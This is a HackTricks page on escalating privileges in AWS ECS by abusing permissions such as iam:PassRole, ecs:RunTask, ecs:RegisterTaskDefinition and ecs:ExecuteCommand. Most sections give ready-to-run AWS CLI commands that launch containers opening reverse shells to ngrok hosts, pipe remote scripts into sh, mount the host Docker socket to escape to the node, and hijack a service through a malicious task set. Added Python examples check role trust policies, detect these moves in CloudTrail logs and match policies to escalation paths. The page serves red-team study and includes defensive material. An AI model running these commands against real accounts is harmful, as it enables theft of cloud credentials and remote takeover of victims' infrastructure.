AWS - ECS Privesc
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
ECS
More information about ECS in:
iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask
An attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:RunTask permissions in ECS can register a new task definition with a malicious container that steals the metadata credentials (the task role's credentials, served by the ECS task metadata endpoint) and run it.
```bash
# Generate task definition with rev shell
# --task-role-arn is the role whose credentials the container will receive
aws ecs register-task-definition --family iam_exfiltration \
    --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
    --network-mode "awsvpc" \
    --cpu 256 --memory 512 \
    --requires-compatibilities "[\"FARGATE\"]" \
    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
    --cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
    --launch-type FARGATE \
    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
```
Potential Impact: Direct privesc to a different ECS role.
iam:PassRole, ecs:RunTask
An attacker with the iam:PassRole and ecs:RunTask permissions can launch a new ECS task with a modified execution role, task role and container command. The ecs run-task (CLI) command has a --overrides flag that allows the executionRoleArn, the taskRoleArn and the container command to be changed at runtime without modifying the task definition.
The IAM roles given as taskRoleArn and executionRoleArn must allow ecs-tasks.amazonaws.com to assume them in their trust policy.
The attacker also needs to know:
- the ECS cluster name
- a VPC subnet
- a security group (if none is specified, the VPC's default security group is used)
- the task definition name and revision
- the container name
```bash
aws ecs run-task \
    --cluster <cluster-name> \
    --launch-type FARGATE \
    --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
    --task-definition <task-definition:revision> \
    --overrides '
{
    "taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
    "containerOverrides": [
        {
            "name": "<container-name>",
            "command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
        }
    ]
}'
```
In the snippet above the attacker only changes the taskRoleArn value. However, for the attack to work the attacker must hold iam:PassRole over the taskRoleArn passed in the command and over the executionRoleArn set in the task definition.
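Because a passed role is useless unless ecs-tasks.amazonaws.com can assume it, the trust policy is worth checking before spending a PassRole. The Python below is an added example, not part of the original page: it evaluates a role's AssumeRolePolicyDocument offline (for instance the JSON printed by `aws iam get-role --role-name <name> --query Role.AssumeRolePolicyDocument`) and reports whether the ECS tasks service principal is allowed. The role names and policies it embeds are constructed samples. Condition blocks are deliberately ignored, so a conditioned Allow is still reported and must be checked by hand.

```python
import json

ECS_TASKS_PRINCIPAL = "ecs-tasks.amazonaws.com"


def _as_list(value):
    """IAM lets most policy fields be a single string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _statement_targets(stmt, service):
    """True if the statement names `service` (or '*') as principal for sts:AssumeRole."""
    principal = stmt.get("Principal", {})
    if principal == "*":
        services = ["*"]
    elif isinstance(principal, dict):
        services = _as_list(principal.get("Service"))
    else:
        services = []
    actions = [a.lower() for a in _as_list(stmt.get("Action"))]
    action_ok = any(a in ("sts:assumerole", "sts:*", "*") for a in actions)
    return action_ok and (service in services or "*" in services)


def ecs_tasks_can_assume(trust_policy):
    """Return True if ecs-tasks.amazonaws.com may assume a role with this trust policy.

    Accepts the policy as a dict or a JSON string. An explicit Deny naming the
    ECS principal wins over any Allow. Condition blocks are ignored.
    """
    if isinstance(trust_policy, str):
        trust_policy = json.loads(trust_policy)
    allowed = denied = False
    for stmt in _as_list(trust_policy.get("Statement")):
        if not _statement_targets(stmt, ECS_TASKS_PRINCIPAL):
            continue
        if stmt.get("Effect") == "Allow":
            allowed = True
        elif stmt.get("Effect") == "Deny":
            denied = True
    return allowed and not denied


def passable_to_ecs(roles):
    """Given {role_name: trust_policy}, return the role names an ECS task could run as."""
    return sorted(name for name, policy in roles.items() if ecs_tasks_can_assume(policy))


# Constructed sample trust policies; the role names are invented.
SAMPLE_ROLES = {
    "HighPrivilegedECSTaskRole": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow",
                       "Principal": {"Service": "ecs-tasks.amazonaws.com"},
                       "Action": "sts:AssumeRole"}],
    },
    # Trusts several services in one list; ECS tasks are among them.
    "ecsTaskExecutionRole": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow",
                       "Principal": {"Service": ["ecs.amazonaws.com", "ecs-tasks.amazonaws.com"]},
                       "Action": ["sts:AssumeRole"]}],
    },
    # Only Lambda may assume this one: passing it to run-task fails.
    "LambdaOnlyRole": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow",
                       "Principal": {"Service": "lambda.amazonaws.com"},
                       "Action": "sts:AssumeRole"}],
    },
    # Broad Allow undone by an explicit Deny for the ECS principal.
    "DeniedForEcsRole": {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Principal": "*", "Action": "sts:AssumeRole"},
            {"Effect": "Deny", "Principal": {"Service": "ecs-tasks.amazonaws.com"},
             "Action": "sts:AssumeRole"},
        ],
    },
}

if __name__ == "__main__":
    print(passable_to_ecs(SAMPLE_ROLES))
```

Feed it the trust policies of every role you can pass (iam:ListRoles plus iam:GetRole are enough to collect them) and only the names it returns are worth trying as taskRoleArn or executionRoleArn.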
If the IAM role the attacker can pass has enough privileges to pull the ECR image and launch the ECS task (ecr:BatchCheckLayerAvailability, ecr:GetDownloadUrlForLayer, ecr:BatchGetImage, ecr:GetAuthorizationToken), the attacker can use that same IAM role for both executionRoleArn and taskRoleArn in the ecs run-task command, so a single passable role is enough:
```bash
aws ecs run-task \
    --cluster <cluster-name> \
    --launch-type FARGATE \
    --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
    --task-definition <task-definition:revision> \
    --overrides '
{
    "taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
    "executionRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
    "containerOverrides": [
        {
            "name": "<container-name>",
            "command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
        }
    ]
}'
```
Potential Impact: Direct privesc to any ECS task role.
iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask
Just like in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:StartTask permissions in ECS can register a new task definition with a malicious container that steals the metadata credentials and run it.
However, in this case a container instance (an EC2 instance registered in the cluster) is needed to run the malicious task definition, because start-task places the task on the container instance you name rather than letting the scheduler pick one.
```bash
# Generate task definition with rev shell
# Default (bridge) network mode is used here so start-task needs no --network-configuration
aws ecs register-task-definition --family iam_exfiltration \
    --task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
    --cpu 256 --memory 512 \
    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Place the task on a specific container instance of the cluster
aws ecs start-task --task-definition iam_exfiltration \
    --cluster <cluster-name> \
    --container-instances <container-instance-id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
```
Potential Impact: Direct privesc to any ECS role.
iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)
Just like in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:UpdateService or ecs:CreateService permissions in ECS can register a new task definition with a malicious container that steals the metadata credentials and run it by creating a new service (or pointing an existing one at the new task definition) with at least one running task.
```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
    --task-role-arn "$ECS_ROLE_ARN" \
    --network-mode "awsvpc" \
    --cpu 256 --memory 512 \
    --requires-compatibilities "[\"FARGATE\"]" \
    --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
    --task-definition iam_exfiltration \
    --desired-count 1 \
    --cluster "$CLUSTER_ARN" \
    --launch-type FARGATE \
    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
    --service <SERVICE NAME> \
    --task-definition <NEW TASK DEFINITION NAME>
```
Potential Impact: Direct privesc to any ECS role.
iam:PassRole, (ecs:UpdateService|ecs:CreateService)
Even without ecs:RegisterTaskDefinition these permissions are enough: the attacker can create a service (or update an existing one) that uses an already registered task definition whose taskRoleArn is a role they can pass, and the running task then exposes that role's credentials. Note that the --overrides flag belongs to run-task and start-task only; create-service and update-service accept no role or command overrides, so the role has to come from the task definition itself. If the attacker also holds ecs:RunTask, the overrides approach lets them execute arbitrary commands in a container with an arbitrary role without touching any service, using something like:
```bash
aws ecs run-task \
    --task-definition "<task-name>" \
    --overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
    --cluster <cluster-name> \
    --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-id>\"]}}"
```
Potential Impact: Direct privesc to any ECS role.
ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)
This scenario is like the previous ones but without the iam:PassRole permission.
It is still interesting because, if you can run an arbitrary container even without a role, you could run a privileged container (or one that mounts the host's Docker socket, as below) to escape to the node and steal the EC2 instance's IAM role and the roles of the other ECS containers running on that node.
You could even force other tasks to run inside the EC2 instance you compromise in order to steal their credentials (as explained in the Privesc to node section).
Warning: this attack is only possible if the ECS cluster uses EC2 instances and not Fargate, since Fargate tasks have no host to escape to.
```bash
# Container definition that mounts the host's Docker socket into the container
cat > /tmp/task.json <<'EOF'
[
  {
    "name": "exfil_creds",
    "image": "python:latest",
    "entryPoint": ["sh", "-c"],
    "command": ["/bin/bash -c \"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\""],
    "mountPoints": [
      {
        "readOnly": false,
        "containerPath": "/var/run/docker.sock",
        "sourceVolume": "docker-socket"
      }
    ]
  }
]
EOF

# Host volume backing that mount point
cat > /tmp/volumes.json <<'EOF'
[
  {
    "name": "docker-socket",
    "host": {
      "sourcePath": "/var/run/docker.sock"
    }
  }
]
EOF

aws ecs register-task-definition --family iam_exfiltration \
    --cpu 256 --memory 512 \
    --requires-compatibilities '["EC2"]' \
    --container-definitions file:///tmp/task.json \
    --volumes file:///tmp/volumes.json

aws ecs run-task --task-definition iam_exfiltration \
    --cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
    --launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
```
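From the defender's side, every step in the sections above leaves a CloudTrail record whose requestParameters mirrors the API request: a RunTask or StartTask carrying overrides.taskRoleArn or overrides.executionRoleArn, a RegisterTaskDefinition whose container definitions mount the host's Docker socket or run privileged, or a launch with enableExecuteCommand set. The Python below is an added detection example, not part of the original page; the three records it scans are constructed to follow that layout (the event IDs, account number and role names are invented). Against real data, pass it the Records array of a CloudTrail log file.

```python
import json

# Host paths whose mount into a task container is a node-escape signal.
SUSPICIOUS_HOST_PATHS = {"/var/run/docker.sock", "/", "/proc", "/sys"}
LAUNCH_EVENTS = {"RunTask", "StartTask", "CreateService", "UpdateService"}


def _role_overrides(params):
    """Names of the role fields changed via --overrides, if any."""
    overrides = params.get("overrides") or {}
    return [k for k in ("taskRoleArn", "executionRoleArn") if overrides.get(k)]


def _task_definition_findings(params):
    """Flag privileged containers and mounts of sensitive host paths."""
    host_paths = {v.get("name"): (v.get("host") or {}).get("sourcePath")
                  for v in params.get("volumes") or []}
    findings = []
    for c in params.get("containerDefinitions") or []:
        cname = c.get("name")
        if c.get("privileged"):
            findings.append(f"container {cname} is privileged")
        for mp in c.get("mountPoints") or []:
            src = host_paths.get(mp.get("sourceVolume"))
            if src in SUSPICIOUS_HOST_PATHS:
                findings.append(f"container {cname} mounts host path {src}")
    return findings


def analyse_event(event):
    """Return the findings for one CloudTrail record (empty list if benign)."""
    if event.get("eventSource") != "ecs.amazonaws.com":
        return []
    name = event.get("eventName")
    params = event.get("requestParameters") or {}
    findings = []
    if name in ("RunTask", "StartTask"):
        roles = _role_overrides(params)
        if roles:
            findings.append(f"{name} overrides {', '.join(roles)}")
        containers = (params.get("overrides") or {}).get("containerOverrides") or []
        if any(c.get("command") for c in containers):
            findings.append(f"{name} overrides a container command")
    if name in LAUNCH_EVENTS and params.get("enableExecuteCommand"):
        findings.append(f"{name} enables ECS Exec")
    if name == "RegisterTaskDefinition":
        findings.extend(_task_definition_findings(params))
    return findings


def scan(records):
    """Map eventID -> findings for every record that triggered at least one rule."""
    hits = {}
    for record in records:
        findings = analyse_event(record)
        if findings:
            hits[record.get("eventID")] = findings
    return hits


# Constructed sample records modelled on CloudTrail's layout; nothing here is real.
SAMPLE_RECORDS = [
    {   # run-task with --overrides swapping the task role and the command
        "eventID": "ev-1", "eventSource": "ecs.amazonaws.com", "eventName": "RunTask",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
        "requestParameters": {
            "cluster": "API", "taskDefinition": "api:3", "launchType": "FARGATE",
            "overrides": {
                "taskRoleArn": "arn:aws:iam::123456789012:role/HighPrivilegedECSTaskRole",
                "containerOverrides": [{"name": "api",
                                        "command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]}],
            },
        },
    },
    {   # register-task-definition with the Docker socket mounted from the host
        "eventID": "ev-2", "eventSource": "ecs.amazonaws.com", "eventName": "RegisterTaskDefinition",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
        "requestParameters": {
            "family": "iam_exfiltration",
            "volumes": [{"name": "docker-socket", "host": {"sourcePath": "/var/run/docker.sock"}}],
            "containerDefinitions": [{"name": "exfil_creds", "image": "python:latest",
                                      "mountPoints": [{"sourceVolume": "docker-socket",
                                                       "containerPath": "/var/run/docker.sock"}]}],
        },
    },
    {   # ordinary deployment: no overrides, no exec, no host mounts
        "eventID": "ev-3", "eventSource": "ecs.amazonaws.com", "eventName": "RunTask",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:role/deployer"},
        "requestParameters": {"cluster": "API", "taskDefinition": "api:3", "launchType": "FARGATE"},
    },
]

if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_RECORDS), indent=2))
```

Role overrides on RunTask are rare in legitimate pipelines, so that rule can page directly; the RegisterTaskDefinition rule should be tuned with an allow-list of families (log shippers and monitoring agents routinely mount /var/run/docker.sock on EC2 clusters).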
ecs:ExecuteCommand, ecs:DescribeTasks, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)
An attacker with ecs:ExecuteCommand and ecs:DescribeTasks can execute commands inside a running container and exfiltrate the IAM role attached to it (the describe permission is needed because aws ecs execute-command calls DescribeTasks before opening the session).
However, for this to work the task must have been launched with ECS Exec enabled (enableExecuteCommand, which is off by default) so that ECS injects the SSM agent into its containers, and the task role must allow the ssmmessages actions the agent uses to open the channel.
Therefore the attacker can try to:
- Run a command in every running container:
```bash
# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq -r '.clusterArns[]'); do
    echo "Cluster $cluster"
    for task in $(aws ecs list-tasks --cluster "$cluster" | jq -r '.taskArns[]'); do
        echo "  Task $task"
        # If true, it's your lucky day
        aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | jq '.tasks[].enableExecuteCommand'
    done
done

# Execute a shell in a container
# Add --container <name> if the task runs more than one container
aws ecs execute-command --interactive \
    --command "sh" \
    --cluster "$CLUSTER_ARN" \
    --task "$TASK_ARN"
```
- If they have ecs:RunTask, run a task with aws ecs run-task --enable-execute-command [...]
- If they have ecs:StartTask, run a task with aws ecs start-task --enable-execute-command [...]
- If they have ecs:CreateService, create a service with aws ecs create-service --enable-execute-command [...]
- If they have ecs:UpdateService, update a service with aws ecs update-service --enable-execute-command [...]
You can find examples of these options in the previous ECS privesc sections.
Potential Impact: Privesc to a different role attached to containers.
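To check a compromised principal (or audit a policy) against all the permission sets listed in the sections above at once, the Python below, an added example that is not part of the original page, encodes each path's required actions and matches them IAM-style against the Allow and Deny action patterns of a policy document (wildcards such as ecs:* are honoured and an explicit Deny wins). It deliberately ignores Resource and Condition, so a reported path is a candidate to verify with the commands above, not a confirmed privesc. The policy at the bottom is a constructed sample.

```python
from fnmatch import fnmatchcase

LAUNCH_ACTIONS = ("ecs:RunTask", "ecs:StartTask", "ecs:UpdateService", "ecs:CreateService")

# Each path maps to the alternative action sets that enable it; every action in
# one alternative must be allowed. Names follow the section headings above.
PRIVESC_PATHS = {
    "PassRole + RegisterTaskDefinition + RunTask": [
        {"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:RunTask"}],
    "PassRole + RunTask (overrides)": [{"iam:PassRole", "ecs:RunTask"}],
    "PassRole + RegisterTaskDefinition + StartTask": [
        {"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:StartTask"}],
    "PassRole + RegisterTaskDefinition + (UpdateService|CreateService)": [
        {"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:UpdateService"},
        {"iam:PassRole", "ecs:RegisterTaskDefinition", "ecs:CreateService"}],
    "PassRole + (UpdateService|CreateService)": [
        {"iam:PassRole", "ecs:UpdateService"}, {"iam:PassRole", "ecs:CreateService"}],
    "RegisterTaskDefinition + launch (no PassRole, EC2 node escape)": [
        {"ecs:RegisterTaskDefinition", a} for a in LAUNCH_ACTIONS],
    "ExecuteCommand + DescribeTasks + launch": [
        {"ecs:ExecuteCommand", "ecs:DescribeTasks", a} for a in LAUNCH_ACTIONS],
    "CreateTaskSet + UpdateServicePrimaryTaskSet + DescribeTaskSets": [
        {"ecs:CreateTaskSet", "ecs:UpdateServicePrimaryTaskSet", "ecs:DescribeTaskSets"}],
}


def action_allowed(action, allowed_patterns, denied_patterns=()):
    """IAM-style action match: case-insensitive, '*'/'?' wildcards, Deny beats Allow."""
    act = action.lower()
    if any(fnmatchcase(act, p.lower()) for p in denied_patterns):
        return False
    return any(fnmatchcase(act, p.lower()) for p in allowed_patterns)


def enabled_paths(allowed_patterns, denied_patterns=()):
    """Names of the privesc paths whose required actions are all allowed, in page order."""
    return [name for name, alternatives in PRIVESC_PATHS.items()
            if any(all(action_allowed(a, allowed_patterns, denied_patterns) for a in alt)
                   for alt in alternatives)]


def actions_from_policy(policy):
    """Collect (allow, deny) action pattern sets from an IAM policy document.

    Resource and Condition are ignored on purpose: this is a triage filter, not
    a policy simulator.
    """
    allow, deny = set(), set()
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    for stmt in statements:
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        if stmt.get("Effect") == "Allow":
            allow.update(actions)
        elif stmt.get("Effect") == "Deny":
            deny.update(actions)
    return allow, deny


# Constructed sample policy: broad ECS rights, but PassRole explicitly denied.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["ecs:*", "ecr:Get*", "iam:PassRole"], "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:PassRole", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    allow, deny = actions_from_policy(SAMPLE_POLICY)
    for path in enabled_paths(allow, deny):
        print("candidate:", path)
```

Run actions_from_policy over every inline and attached policy of the principal (iam:GetUserPolicy / iam:GetRolePolicy / iam:GetPolicyVersion) and merge the sets before calling enabled_paths; the sample shows why Deny must be collected too, since a denied iam:PassRole removes every PassRole-based path and leaves only the node-escape, ECS Exec and task-set routes.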
ssm:StartSession
Check the ssm privesc page for how you can abuse this permission to privesc to ECS:
iam:PassRole, ec2:RunInstances
Check the ec2 privesc page for how you can abuse these permissions to privesc to ECS:
ecs:RegisterContainerInstance, ecs:DeregisterContainerInstance, ecs:StartTask, iam:PassRole
An attacker with these permissions could potentially register an EC2 instance in an ECS cluster and run tasks on it. This could allow the attacker to execute arbitrary code in the context of the ECS tasks.
- TODO: Is it possible to register an instance from a different AWS account so tasks are run under machines controlled by the attacker??
ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets
Note: TODO: Test this
An attacker with the permissions ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet and ecs:DescribeTaskSets can create a malicious task set for an existing ECS service and make it the service's primary task set. This allows the attacker to execute arbitrary code inside the service. Task sets only exist for services that use the EXTERNAL deployment controller; against a service managed by the default ECS (rolling update) or the CODE_DEPLOY controller the calls below are rejected.
```bash
# Register a task definition with a reverse shell
echo '{
  "family": "malicious-task",
  "containerDefinitions": [
    {
      "name": "malicious-container",
      "image": "alpine",
      "command": [
        "sh",
        "-c",
        "apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
      ]
    }
  ]
}' > malicious-task-definition.json
aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service (only services with the EXTERNAL deployment controller have task sets)
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service (use the taskSetArn returned by create-task-set)
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
```
Potential Impact: Arbitrary code execution in the affected service, which can disrupt its functionality or lead to exfiltration of sensitive data.